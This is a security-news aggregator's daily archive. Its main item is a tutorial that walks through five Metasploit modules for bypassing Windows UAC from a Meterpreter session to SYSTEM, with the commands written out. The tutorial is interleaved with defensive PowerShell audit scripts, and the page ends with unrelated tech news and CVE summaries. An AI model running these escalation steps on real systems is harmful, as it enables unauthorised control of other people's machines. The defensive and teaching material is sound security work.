Daily Archives: September 15, 2018

Multiple Ways to Bypass UAC using Metasploit

Hello friends!! Today we are shedding light on User Account Control, commonly abbreviated UAC. We will also look at how it can protect you from malicious software and how ignoring the UAC prompt can put your system at risk.

Table of contents

Introduction to UAC

What is UAC?

Working of UAC

5 ways to Bypass UAC

  1. Windows Escalate UAC Protection Bypass
  2. Windows Escalate UAC Protection Bypass (In Memory Injection)
  3. Windows UAC Protection Bypass (Via FodHelper Registry Key)
  4. Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
  5. Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)

Introduction to User Account Control

What is User Account Control?

User Account Control was introduced with Microsoft’s Windows Vista and Windows Server 2008 operating systems to prevent unwanted system-wide changes in a way that is predictable and requires minimal effort from the user.

In other words, it is a security feature of Windows that helps prevent unauthorized modifications to the operating system. UAC makes sure that certain changes are made only with authorization from the administrator. If the administrator does not permit the changes, they are not executed and Windows remains unchanged.

How does UAC work?

UAC works by preventing a program from carrying out tasks that involve system-wide changes. These operations will not work unless the process attempting them is running with administrator rights. If you run a program as administrator, it has more privileges because it is “elevated”, compared to programs that are not running as administrator.

Some things which cannot be done without administrator rights:

  • Registry modifications (a key under e.g. HKEY_LOCAL_MACHINE affects more than one user, so it is read-only to a non-elevated process)
  • Loading a device driver
  • DLL injection
  • Modifying system time (clock)
  • Modifying User Account Control settings (via the Registry it can be enabled/disabled, but you need the correct privileges to do this)
  • Modifying protected directories (e.g. the Windows folder, Program Files)
  • Creating scheduled tasks (e.g. to auto-start with administrator privileges)

UAC won’t automatically block malicious software; its purpose was never to decide whether a program is malicious or not. That decision is down to the user just as much. If a program is going to be executed with administrator privileges, the user will be alerted and will need to provide confirmation.

https://malwaretips.com/threads/why-uac-is-important-and-how-it-can-protect-you.47157/
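Before looking at the bypasses, it helps to know which UAC policy a machine actually runs, because the level decides whether an elevation prompt is shown at all. The following PowerShell is an added example, not code from the original post or from Metasploit: it reads the documented UAC policy values under HKLM and summarises them. The registry path and value names are the standard Windows policy settings; the wording of the assessment is this script's own.

```powershell
# Added example (not from the original post): read the registry values that
# define the UAC policy on the local machine and summarise what they mean.

function Get-UacPolicy {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p   = Get-ItemProperty -Path $key

    # Documented meanings of ConsentPromptBehaviorAdmin (keys kept as strings
    # so a missing or odd value never throws).
    $adminPrompt = @{
        '0' = 'Elevate without prompting'
        '1' = 'Prompt for credentials on the secure desktop'
        '2' = 'Prompt for consent on the secure desktop'
        '3' = 'Prompt for credentials'
        '4' = 'Prompt for consent'
        '5' = 'Prompt for consent for non-Windows binaries (default)'
    }

    $enableLua = $p.EnableLUA
    $cpba      = $p.ConsentPromptBehaviorAdmin
    $secure    = $p.PromptOnSecureDesktop

    $meaning = if ($null -ne $cpba) { $adminPrompt[[string]$cpba] } else { 'not set' }

    $assessment =
        if ($enableLua -eq 0) {
            'UAC is disabled: administrators run fully elevated with no prompt'
        } elseif ($cpba -eq 0) {
            'Silent elevation: administrators are never prompted'
        } elseif ($cpba -eq 2 -and $secure -eq 1) {
            '"Always notify": Windows binaries are not auto-elevated, so bypasses that rely on auto-elevation still produce a prompt'
        } elseif ($cpba -eq 5) {
            'Default level: signed Windows binaries auto-elevate; raising the slider to "Always notify" removes that path'
        } else {
            'Custom policy level: review ConsentPromptBehaviorAdmin against the table in this script'
        }

    # One object per host so the output can be collected fleet-wide
    [pscustomobject]@{
        EnableLUA                  = $enableLua
        ConsentPromptBehaviorAdmin = $cpba
        AdminPromptMeaning         = $meaning
        ConsentPromptBehaviorUser  = $p.ConsentPromptBehaviorUser
        PromptOnSecureDesktop      = $secure
        EnableInstallerDetection   = $p.EnableInstallerDetection
        Assessment                 = $assessment
    }
}

Get-UacPolicy | Format-List
```

Run it from an ordinary (non-elevated) PowerShell; the key is world-readable. The assessment deliberately singles out the "Always notify" position: every module described below depends on Windows auto-elevating one of its own signed binaries, and that behaviour is switched off at that level, which is why hardening guides recommend it for administrator accounts.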

5 Ways to Bypass UAC

First, exploit the target machine to obtain a Meterpreter session. Once you have Meterpreter session 1, type the following commands to check the system authority and privileges.

getsystem

getuid

If you do not have system/admin privileges, then you should try to bypass the UAC protection of the targeted system.

Windows Escalate UAC Protection Bypass

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.

msf > use exploit/windows/local/bypassuac
msf exploit(windows/local/bypassuac) > set session 1
msf exploit(windows/local/bypassuac) > exploit

From the given image you can observe that Meterpreter session 2 opened; now type the following commands to determine the system authority and privileges.

getsystem
getuid

Great!! Here we got NT AUTHORITY\SYSTEM privilege; now if you type the “shell” command, you will get access to a command prompt with administrator privilege.

Windows Escalate UAC Protection Bypass (In Memory Injection)

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_injection
msf exploit(windows/local/bypassuac_injection) > set session 1
msf exploit(windows/local/bypassuac_injection) > exploit

From the given image you can observe that Meterpreter session 2 opened; now type the following commands to determine the system authority and privileges.

getsystem
getuid

Ultimately you will get NT AUTHORITY\SYSTEM privilege; now if you run the “shell” command, you will get access to a command prompt with administrator privilege.

Windows UAC Protection Bypass (Via FodHelper Registry Key)

This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_fodhelper
msf exploit(windows/local/bypassuac_fodhelper) > set session 1
msf exploit(windows/local/bypassuac_fodhelper) > exploit

From the given image you can observe that Meterpreter session 2 opened; now type the following commands to determine the system authority and privileges.

getsystem
getprivs

Great!! Here we got NT AUTHORITY\SYSTEM privilege; now if you type the “shell” command, you will get access to a command prompt with administrator privilege.

Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)

This module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows Event Viewer is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_eventvwr
msf exploit(windows/local/bypassuac_eventvwr) > set session 1
msf exploit(windows/local/bypassuac_eventvwr) > exploit

From the given image you can observe that Meterpreter session 2 opened; now type the following commands to determine the system authority and privileges.

getsystem
getuid

And again you will get NT AUTHORITY\SYSTEM Privilege.

Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)

This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entries are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation. This module requires the architecture of the payload to match the OS, but the current low-privilege Meterpreter session architecture can be different. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process. This module invokes the target binary via cmd.exe on the target. Therefore if cmd.exe access is restricted, this module will not run correctly.

msf > use exploit/windows/local/bypassuac_comhijack
msf exploit(windows/local/bypassuac_comhijack) > set session 1
msf exploit(windows/local/bypassuac_comhijack) > exploit

From the given image you can observe that Meterpreter session 2 opened; now type the following commands to determine the system authority and privileges.

getsystem
getuid

Finally you will get NT AUTHORITY\SYSTEM privilege; if you again run the “shell” command, you will get access to a command prompt with administrator privilege. In this way we can use Metasploit's post-exploitation modules to bypass UAC protection.
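The FodHelper, Eventvwr and COM Handler Hijack modules above all share one pattern: they plant a per-user entry under HKCU\Software\Classes that an auto-elevated process consults before the machine-wide one under HKLM. On a managed workstation such per-user overrides of machine-registered classes are rare, so enumerating them is a cheap audit. The PowerShell below is an added example, not code from the original post or from Metasploit; it lists the current user's per-user shell handlers and COM servers and flags those that shadow an HKLM registration. The registry paths and value names are standard Windows layout; the findings format is this script's own.

```powershell
# Added example (not from the original post): audit HKCU\Software\Classes for
# per-user shell handlers and COM servers that shadow machine-wide entries.
# HKCR is a merged view in which HKCU\Software\Classes wins over
# HKLM\Software\Classes, which is what the registry-key bypasses exploit.

function Get-UserClassOverrides {
    $userRoot    = 'HKCU:\Software\Classes'
    $machineRoot = 'HKLM:\Software\Classes'
    $findings    = @()

    # 1. Per-user "shell\open\command" handlers. A ProgID or URL scheme that
    #    is also registered under HKLM is being overridden for this user only.
    foreach ($class in Get-ChildItem -Path $userRoot -ErrorAction SilentlyContinue) {
        $name   = $class.PSChildName
        $cmdKey = "$userRoot\$name\shell\open\command"
        if (-not (Test-Path -LiteralPath $cmdKey)) { continue }
        $props = Get-ItemProperty -LiteralPath $cmdKey
        $findings += [pscustomobject]@{
            Kind            = 'ShellOpenCommand'
            Key             = $cmdKey
            Command         = $props.'(default)'
            # Reported because its presence changes how the handler is launched
            DelegateExecute = $props.DelegateExecute
            ShadowsHKLM     = Test-Path -LiteralPath "$machineRoot\$name"
        }
    }

    # 2. Per-user COM servers. A CLSID that also exists under HKLM redirects
    #    that COM object to a user-controlled binary for this user.
    $clsidRoot = "$userRoot\CLSID"
    if (Test-Path -LiteralPath $clsidRoot) {
        foreach ($clsid in Get-ChildItem -LiteralPath $clsidRoot -ErrorAction SilentlyContinue) {
            foreach ($server in 'InprocServer32', 'LocalServer32') {
                $serverKey = "$clsidRoot\$($clsid.PSChildName)\$server"
                if (-not (Test-Path -LiteralPath $serverKey)) { continue }
                $findings += [pscustomobject]@{
                    Kind            = "COM-$server"
                    Key             = $serverKey
                    Command         = (Get-ItemProperty -LiteralPath $serverKey).'(default)'
                    DelegateExecute = $null
                    ShadowsHKLM     = Test-Path -LiteralPath "$machineRoot\CLSID\$($clsid.PSChildName)"
                }
            }
        }
    }

    $findings
}

# Shadowing entries first; on a clean workstation this list is usually short.
Get-UserClassOverrides | Sort-Object ShadowsHKLM -Descending | Format-Table -AutoSize
```

Two caveats for use as a detection. The script only sees the hive of the user running it, so for other accounts you would load their NTUSER.DAT or run it in their context; and the modules clean up their keys after the payload runs, so a point-in-time audit can miss them. For continuous coverage, feed Sysmon registry events (Event ID 12 for key creation and 13 for value writes) under HKCU\Software\Classes into your SIEM and treat a new shell\open\command or CLSID server there, followed by a high-integrity child process, as an alert.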

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast.

The post Multiple Ways to Bypass UAC using Metasploit appeared first on Hacking Articles.

Research Proving People Don’t RTFM, Resent ‘Over-Featured’ Products, Wins Ig Nobel Prize

An anonymous reader writes: Thursday the humor magazine Annals of Improbable Research held their 28th annual ceremony recognizing the real (but unusual) scientific research papers "that make people laugh, then think." And winning this year's coveted Literature prize was a paper titled "Life Is Too Short to RTFM: How Users Relate to Documentation and Excess Features in Consumer Products," which concluded that most people really, truly don't read the manual, "and most do not use all the features of the products that they own and use regularly..." "Over-featuring and being forced to consult manuals also appears to cause negative emotional experiences." Another team measured "the frequency, motivation, and effects of shouting and cursing while driving an automobile," which won them the Ig Nobel Peace Prize. Other topics of research included self-colonoscopies, removing kidney stones with roller coasters, and (theoretical) cannibalism. "Acceptance speeches are limited to 60 seconds," reports Ars Technica, "strictly enforced by an eight-year-old girl nicknamed 'Miss Sweetie-Poo,' who will interrupt those who exceed the time limit by repeating, 'Please stop. I'm bored.' Until they stop." You can watch the whole wacky ceremony on YouTube. The awards are presented by actual Nobel Prize laureates -- and at least one past winner of an Ig Nobel Prize later went on to win an actual Nobel Prize.

Read more of this story at Slashdot.

Germany Responds To Russian Hybrid Warfare With Improved Military Cyber Capabilities | German Chancellor, Angela Merkel, NATO, russia, germany, :: News :: Africa Independent Television – AIT

aitonline.tv - Merkel Made This Public While Speaking With German Troops Stationed In Lithuania As Part Of A NATO Force Deployed To Deter Russia. NATO Allies Have Accused Russia Of Using "Hybrid Warfare" Techniques…


Tweeted by @AIT_Online https://twitter.com/AIT_Online/status/1041159739457978368

CVE-2018-17075

The html package (aka x/net/html) before 2018-07-13 in Go mishandles "in frameset" insertion mode, leading to a "panic: runtime error" for html.Parse of <template><object>, <template><applet>, or <template><marquee>. This is related to HTMLTreeBuilder.cpp in WebKit.

CVE-2018-16554

The ProcessGpsInfo function of the gpsinfo.c file of jhead 3.00 may allow a remote attacker to cause a denial-of-service attack or unspecified other impact via a malicious JPEG file, because of inconsistency between float and double in a sprintf format string during TAG_GPS_ALT handling.

Does LinkedIn Suck?

"LinkedIn Sucks" writes TechCrunch's John Biggs: I hate LinkedIn. I open it out of habit and accept everyone who adds me because I don't know why I wouldn't. There is no clear benefit to the social network. I've never met a recruiter on there. I've never gotten a job. The only messages I get are spam from offshore dev teams and crypto announcements. It's like Facebook without the benefit of maybe seeing a picture of someone's award-winning chili or dog. I understand that I'm using LinkedIn wrong. I understand I should cultivate a salon-like list of contacts that I can use to source stories and meet interesting people. But I have my own story-sourcing tools and my own contacts. It's not even good as a broadcast medium.... LinkedIn is a spam garden full of misspelled, grunty requests from international software houses that are looking, primarily, to sell you services. Because it's LinkedIn it's super easy to slip past any and all defenses against this spam.... I know people have used LinkedIn to find jobs. I never have. I know people use LinkedIn to sell products. It's never worked for me. The article ends with advice for people trying to contact him on LinkedIn for promotional purposes. "LinkedIn isn't a game. It isn't an alternative to MailChimp. It's a conversational tool. Use it that way." But what do Slashdot's readers think? Is LinkedIn a valuable resource for finding recruiters and job offers, interesting perspectives, and updates on your friends' careers? Or does LinkedIn suck?

Read more of this story at Slashdot.

E Hacking News – Latest Hacker News and IT Security News: Indian Air Force online exam hacked

A team of tech-savvy fraudsters hacked into an online exam for the selection of non-commissioned Indian Air Force (IAF) officers in Rohtak.

On Saturday, Rohtak police arrested two people for the alleged hacking.

According to Jagbir Singh, the SHO of Rohtak city police station, the exam was held from September 13 to 16, and five computers were hacked.

The exam was conducted by an agency to which it was outsourced by the Centre for Development of Advanced Computing, Singh said. The fiber cable of the exam center was laid from the first floor of an adjacent private hospital, he said.

The fraudsters were able to establish remote access to the computers used in the exam by setting up a parallel network. The team was helping candidates by giving them answers to the questions even as the candidates sat idle in front of their computers.

The five hackers were found sitting with their laptops and sending exam questions to experts, the SHO said.

“Two men, who have been identified as masterminds of the entire racket and ran the exam center, are on the run,” said Singh. “They are J S Dahiya, a retired principal of the Jhajjar ITI, and his partner Sanjay Ahlwat, who runs a competitive exams’ coaching center."

The exact number of beneficiaries is not known, but the accused men charged between Rs 3.5 lakh and Rs 6 lakh from each candidate.


Bitcoin Could Have Smooth Sailing from Here, Technical Oscillator Suggests

While the Ethereum price is only beginning to show signs of recovery, the bitcoin price has managed to hold above key support in the wake of industry setbacks. When the bitcoin price jumped from $6,300 to $6,500 a few days ago, the whole market was watching, including Michael Novogratz, founder of Galaxy Digital.  He was […]

The post Bitcoin Could Have Smooth Sailing from Here, Technical Oscillator Suggests appeared first on Hacked: Hacking Finance.

The Basics of Cyber Warfare: Understanding the Fundamentals of Cyber Warfare in Theory and Practice – CyberWar

tobem.com - As part of the Syngress Basics series, The Basics of Cyber Warfare provides readers with fundamental knowledge of cyber warfare in both theoretical and practical aspects. This book explores the battl…


Tweeted by @CyberToolsBooks https://twitter.com/CyberToolsBooks/status/1041112758488580096

To Fight Climate Change, California Says ‘We’re Launching Our Own Damn Satellite’

An anonymous reader quotes the Los Angeles Times: Jerry Brown closed his climate summit in San Francisco on Friday with a dramatic announcement: California will launch its own satellite into orbit to track and monitor the formation of pollutants that cause climate change. "With science still under attack and the climate threat growing, we're launching our own damn satellite," Brown said in prepared remarks. "This groundbreaking initiative will help governments, businesses and landowners pinpoint -- and stop -- destructive emissions with unprecedented precision, on a scale that's never been done before...." The state will develop the satellite with the San Francisco-based Earth-imaging firm Planet Labs, a company founded by former NASA scientists in 2010. The state may ultimately launch multiple satellites into space, according to the governor's office.... Robbie Schingler, co-founder of Planet Labs, said the project will inform "how advanced satellite technology can enhance our ability to measure, monitor, and ultimately, mitigate the impacts of climate change..." Brown's announcement came in quickly delivered remarks at the close of the three-day gathering and received a standing ovation from many in the audience. Governors from 17 states (and from both political parties) also pledged to spend $1.4 billion to lower auto emissions, using money from Volkswagen's legal settlement over falsifying clean-air performance data. New York City also announced that its pension fund would invest $4 billion in companies offering climate change solutions over the next three years. And 26 states, cities and businesses said they'd procure non-polluting vehicle fleets by 2030, while ChargePoint and EV Box pledged to build 3.5 million new charging stations around the world.

Read more of this story at Slashdot.

Uber Glitch Stops Payments To Drivers, Prices Surge

Uber is still trying to fix a glitch that's been stopping its drivers from collecting the money they've earned for several days. An anonymous reader writes: One Uber driver says the problem's lasted over a week, and he's owed more than $1,300. "They've been continually telling us that it would be corrected within 24 hours," he told a Bay Area news station. "We still can't access the money.... We're in a situation where for a lot of us we have bills every day, we pay tolls every day, we pay gas every single day." Now the San Diego Reader reports the issue "is forcing San Diego drivers off the road," with the shortage of drivers triggering surge pricing throughout the entire region as much as triple the usual rate. Surge pricing is also hitting riders in Dallas, according to another Uber driver's tweet, who complains "It's a shame that a $48 billion 'tech' company can't get it together." In a statement promising they'd still pay all their drivers, Uber acknowledged their payment system was still broken, "and we sincerely regret any inconvenience." "The glitch in the payment system also means that trip and safety issues are unable to be reported, either by the passenger, or the driver," notes the San Diego Reader, adding that the city's Uber drivers "continue to decline to work, either staying off the road or switching to another ride-sharing service."

Read more of this story at Slashdot.

Virtual Land Sales Increase as Decentraland (MANA) Climbs 38%

Decentraland (MANA) climbed 38% against the dollar in the three days since September 12th, and the sudden rise coincides with a marked increase in purchases of digital real estate on Decentraland’s blockchain. In the past twenty-four hours just under $117 million worth of LAND has been bought and sold on Decentraland, equating to just over […]

The post Virtual Land Sales Increase as Decentraland (MANA) Climbs 38% appeared first on Hacked: Hacking Finance.

58% of Silicon Valley Tech Workers Delayed Having Kids Because of Housing Costs

An anonymous reader quotes the Mercury News: Though some residents blame the area's highly paid tech workers for driving up the cost of housing, data increasingly shows that these days, even tech workers feel squeezed by the Bay Area's scorching prices. Fifty-eight percent of tech workers surveyed recently said they have delayed starting a family due to the rising cost of living, according to a poll that included employees from Apple, Uber, Google, LinkedIn, Facebook, Lyft, and other Bay Area companies. The recently released poll was conducted by Blind, an online social network designed to let people share anonymous opinions about their workplaces. Blind surveyed 8,284 tech workers from all over the world, with a large focus on the Bay Area and Seattle. Blind spokeswoman Curie Kim said the findings were "really surprising. In the Bay Area, tech employees are known to make one of the highest salaries in the nation," she said, "but if these people also feel that they can't afford housing and they can't start a family because of the rising cost of living, who can....?" The average base salary for a software engineer at Apple is $121,083 a year, the article notes, yet the company also had the largest percentage of surveyed tech employees who said they'd been forced to delay starting their families -- 69%. "Anywhere else in the country, we'd be successful people who owned a home and didn't worry about anything," said one 34-year-old in a two-income family. "But here, that's not the case." While her husband helps Verizon deploy smart devices with IoT technology, they're raising two daughters in a rented Palo Alto apartment, "only to experience a $500 rent increase over two years."

Read more of this story at Slashdot.

CVE-2018-17066

An issue was discovered on D-Link DIR-816 A2 1.10 B05 devices. An HTTP request parameter is used in command string construction in the handler function of the /goform/form2systime.cgi route. This could lead to command injection via shell metacharacters in the datetime parameter.

CVE-2018-17068

An issue was discovered on D-Link DIR-816 A2 1.10 B05 devices. An HTTP request parameter is used in command string construction in the handler function of the /goform/Diagnosis route. This could lead to command injection via shell metacharacters in the sendNum parameter.

CVE-2018-17063

An issue was discovered on D-Link DIR-816 A2 1.10 B05 devices. An HTTP request parameter is used in command string construction within the handler function of the /goform/NTPSyncWithHost route. This could lead to command injection via shell metacharacters.

CVE-2018-17064

An issue was discovered on D-Link DIR-816 A2 1.10 B05 devices. An HTTP request parameter is used in command string construction within the handler function of the /goform/sylogapply route. This could lead to command injection via the syslogIp parameter after /goform/clearlog is invoked.

CVE-2018-17065

An issue was discovered on D-Link DIR-816 A2 1.10 B05 devices. Within the handler function of the /goform/DDNS route, a very long password could lead to a stack-based buffer overflow and overwrite the return address.

Slashdot Asks: Have You Ever Gotten Someone Else’s Email?

Wave723 shares an article from IEEE's Spectrum: I was scrolling through emails on my phone one recent morning when a strange message appeared among the usual mix of advertisements and morning newsletters. It was a confirmation for an upcoming doctor's appointment in New York City, but came from an address I'd never seen before. And at the top, there was a friendly note: "I guess this is for you :)" The note, I would later learn, was written by a Norwegian named Andre Nordum whose email address is just a few letters different from my own... he'd Googled my name to try to track down my personal email address and forward the message to me. All day, I thought about Andre's act of digital kindness and the heartwarming fact that a stranger had spent time and effort trying to send me a bit of important information. I also felt a twinge of guilt: I'd received emails in the past -- from car dealerships and daycares -- that were clearly meant for other people, and I'd never forwarded any of them along. The 33-year-old Norwegian banker later joked that he did it because "I did not want to get emails about your dermatology history for the foreseeable future." But another Norwegian has been returning mis-directed emails for over a decade with mundane stories about the family dog and games of pickleball -- meant for another E. Nordrum. "It's a little bit like sitting on the bus or overhearing somebody in the restaurant or something," he says, admitting that when they finally stopped coming, "I was a little bit sad, actually." In 2017 the other E. Nordrum flew from America to Norway on a vacation, finally meeting the man who'd been returning all his mis-addressed emails -- and they ended up talking for hours. The article calls it a reminder "of how downright pleasant it can sometimes be to interact with strangers on the Internet." But it also asks an interesting question: "Do these email mix-ups happen to everyone?" I know I'm still getting emails about a storage space somebody opened 1300 miles away. And Slashdot reader antdude writes, "A few days ago, I got an USC.edu's doctor email (CCed with a few other people) about an upcoming surgery for a transplant. I was like huh?" How about the rest of Slashdot's readers. Have you ever gotten someone else's email?

Read more of this story at Slashdot.

Crypto Update: Ethereum Hits 9-day High as Altcoin Bounce Continues

The cryptocurrency segment continued to show signs of short-term strength so far this weekend with the severely oversold altcoins leading the way higher. Ethereum is still in the epicenter of the moves, with the second largest coin pushing higher towards the $235 resistance level as expected. Despite the ongoing bounce, several coins are stuck in […]

The post Crypto Update: Ethereum Hits 9-day High as Altcoin Bounce Continues appeared first on Hacked: Hacking Finance.

Apache Struts & SonicWall’s GMS exploits key targets of Mirai & Gafgyt IoT malware

By Waqas

Security researchers at Palo Alto Networks’ Unit 42 have discovered modified versions of the notorious Mirai and Gafgyt Internet of Things (IoT) malware. The malware have the capability of targeting flaws that affect Apache Struts and SonicWall Global Management System (GMS). Moreover, the Unit 42 researchers also discovered new versions of Mirai and Gafgyt (aka BASHLITE) […]

This is a post from HackRead.com Read the original post: Apache Struts & SonicWall’s GMS exploits key targets of Mirai & Gafgyt IoT malware

Disproportionate Impact of Cyber Espionage in the Global South: India’s Aadhaar Database – Berkeley Journal of International Law Blog

berkeleytravaux.com - By: Anupriya Dhonchak and Shubhangi Agarwalla Recently, a Committee of Experts set up in India to draft a law for data protection in the country after enunciation of the right to privacy by the India…


Tweeted by @BerkeleyIntLaw https://twitter.com/BerkeleyIntLaw/status/1041049641343758336

Quantum Experiment Confirms Causality Is Fuzzy

"An experiment has confirmed that quantum mechanics allows events to occur with no definite causal order," reports an article shared by long-time Slashdot readers UpnAtom and jd. Researchers at the University of Queensland in Australia believe this could link Einstein's general theory of relativity to quantum mechanics, according to Physics World: In classical physics -- and everyday life -- there is a strict causal relationship between consecutive events. If a second event (B) happens after a first event (A), for example, then B cannot affect the outcome of A. This relationship, however, breaks down in quantum mechanics because the temporal spread of a particle's wave function can be greater than the separation in time between A and B. This means that the causal order of A and B cannot always be distinguished by a quantum particle such as a photon. In their experiment, Romero, Costa and colleagues created a "quantum switch", in which photons can take two paths. One path involves being subjected to operation A before operation B, while in the other path B occurs before A. The order in which the operations are performed is determined by the initial polarization of the photon as it enters the switch.... The team did the experiment using several different types of operation for A and B and in all cases they found that the measured polarization of the output photons was consistent with there being no definite causal order between when A and B were applied. Indeed, the measurements backed indefinite causal order to a whopping statistical significance of 18 -- well beyond the 5 threshold that is considered a discovery in physics. Science Magazine applauds the experiments for "obliterating our common sense notion of before and after and, potentially, muddying the concept of causality."

Read more of this story at Slashdot.

Cryptomining malware infects Windows and Linux Kodi users

Word is that users of the Kodi media player who had add-ons from the Bubbles, Gaia, and XvBMC repositories installed on their systems might have been affected by a coin miner.

As discovered by the cyber-security firm ESET, users of Kodi, the free and open-source media player that has continuously evolved over time and spawned a community of its own, have been among the many targets of a malware campaign.

Reports on ZDNet elucidate the findings of the company’s malware analysts, who detected that at least three popular repositories of Kodi add-ons had been infected and were spreading a malware strain that covertly mined cryptocurrency on users’ computers.

For those who find the sound of ‘Kodi’ still foreign, it is an “empty” media player which functions fundamentally on add-ons. After installing Kodi, users add the URL of the add-on repositories of their preference and then from there they select which add-on to install on their players.

Though the player is predominantly used for streaming pirated content, the add-ons permit streaming everything from YouTube to Netflix.
As deduced by ESET researchers, the three aforementioned add-on repositories host malicious code that sets in motion the download of a second Kodi add-on; because the newly downloaded add-on contains code to fingerprint the user’s OS and later install a cryptocurrency miner, the malicious procedure comes to a noxious conclusion.
Although Kodi is available for various platforms, researchers said that the programmers of this malign cryptocurrency mining program have only configured a miner for Linux and Windows users. According to the fragmented data obtained by ESET, the crooks mined Monero and affected over 4,700 users, accumulating over 62 Monero coins worth $7,000.
Countries with a high percentage of Kodi users are, as a matter of fact, the most affected ones as well; to name a few: the UK, Israel, the US, the Netherlands, and Greece.
On the solution front, there is no concrete way of detecting the infection, but users are advised to have antivirus software installed and updated. Besides that, high CPU usage is a probable hint of the attack, as it is a common indicator of cryptocurrency mining operations.

Two Years Ago — UK Report : Libyan Intervention Based on Erroneous Assumptions; David Cameron Ultimately Responsible

gosint.wordpress.com - “We were dragged along by a French enthusiasm to intervene, and the mission then moved from protecting people in Benghazi, who arguably were not at the kind of threat that was then being presented… I…


Tweeted by @mohandeer https://twitter.com/mohandeer/status/1041041974801903617

Cryptocurrency App Mocks Competitor For Getting Hacked. Gets Hacked 4 Days Later

An anonymous reader writes: A hacker going online by the pseudonym of "aabbccddeefg" has exploited a vulnerability to steal over 44,400 EOS coins ($220,000) from a blockchain-based betting app. The hack targeted a blockchain app that lets users bet with EOS coins in a classic dice game. The entire incident is quite hilarious because four days before it happened, the company behind the app was boasting on Twitter that every other dice betting game had been hacked and lost funds. "DEOS Games, a clone and competitor of our dice game, has suffered a severe hack today that drained their bankroll," the company said in a now deleted tweet. "As of now every single dice game and clone site has been hacked. We have the biggest bankroll, the best developers, and a superior UI. Play on." While the hack is somewhat the definition of karma police, it is also quite funny because the hacker himself didn't really care about hiding his tracks or laundering the stolen funds. "So this guy hacks EOSBET and what does he do? Play space invaders. I'm not even kidding...," a user analyzing the hacker's account said.

Read more of this story at Slashdot.

[News] US: China hacking ‘repeatedly raised at highest level’

The US says it has repeatedly raised concerns with Beijing about cyber theft, as a report linked a hacking group with a Chinese military unit. While not commenting directly on the report, a White House spokesman called cyber theft a "major challenge" in the national security arena. The report identified a Shanghai high-rise used by the military as the likely home of a prolific hacking group. China's Defence Ministry has denied any role in hacking. Cyber sabotage, including hacking, was banned, China Daily quoted the ministry as saying, sentiments echoed by Foreign Ministry spokesman Hong Lei.

[News] New Mac malware opens secure reverse shell

A new backdoor Trojan for OS X is making the rounds, attempting to set up a secure connection for a remote hacker to connect through and grab private information. The malware, dubbed "Pintsized" by Intego, is suspected of using a modified implementation of OpenSSH to set up a reverse shell that creates a secure connection to a remote server. The use of an encrypted connection makes it more difficult to detect and trace, especially since it uses the common SSH protocol. In addition, the malware attempts to hide itself by disguising its files to look like components of the OS X printing system, specifically the following:

  • com.apple.cocoa.plist
  • cupsd (Mach-O binary)
  • com.apple.cupsd.plist
  • com.apple.cups.plist
  • com.apple.env.plist

[News] Apple Breached by Facebook Hackers Using Java Exploit

Apple is the latest major American company to enter the security confessional and disclose it has been breached. The company told Reuters today it was attacked by the same crew that hit Facebook, which disclosed its breach last Friday, and that like the social media giant, no data had been stolen. In both cases, a Java zero-day vulnerability had been exploited by attackers, in this case, to gain access to Apple machines. Reuters is reporting that the same attack was used against other Mac computers at hundreds of companies, including some in the defense industrial base. "Apple has identified malware which infected a limited number of Mac systems through a vulnerability in the Java plug-in for browsers. The malware was employed in an attack against Apple and other companies, and was spread through a website for software developers," said Reuters, quoting a statement from Apple. "We identified a small number of systems within Apple that were infected and isolated them from our network. There is no evidence that any data left Apple.”

[News] Botnet master abuses Facebook for pocket money, researchers reveal

A Chinese hacker's main job may well be running a botnet of malware-clotted zombie PCs, but there's always time left in the day for selling fake Likes, apparently. It is not every day that remorseful confessions over lapsed adherence to the Five Precepts of Buddhism help researchers identify a hacker. In early 2012, hacker Zhang Changhe admitted, on Chinese social network Kaixin001, to breaking all Five Precepts of Buddhism. Sexual misconduct, lying, and drinking aside, Zhang Changhe wrote that he also stole "continuously and shamelessly," though he hoped that he could stop stealing in the future. Turns out that Zhang Changhe runs a botnet. (Perhaps that is what he was alluding to when he spoke of stealing "continuously and shamelessly"?) Two security researchers, Dell SecureWorks's Joe Stewart and a 33-year-old blogger called "Cyb3rsleuth", claim that Zhang Changhe also reportedly works for the Chinese army and teaches at PLA Information Engineering University, a center for electronic intelligence, comparable to the US's National Security Agency's university.

[News] Apple, Facebook, Twitter hacks said to hail from Eastern Europe

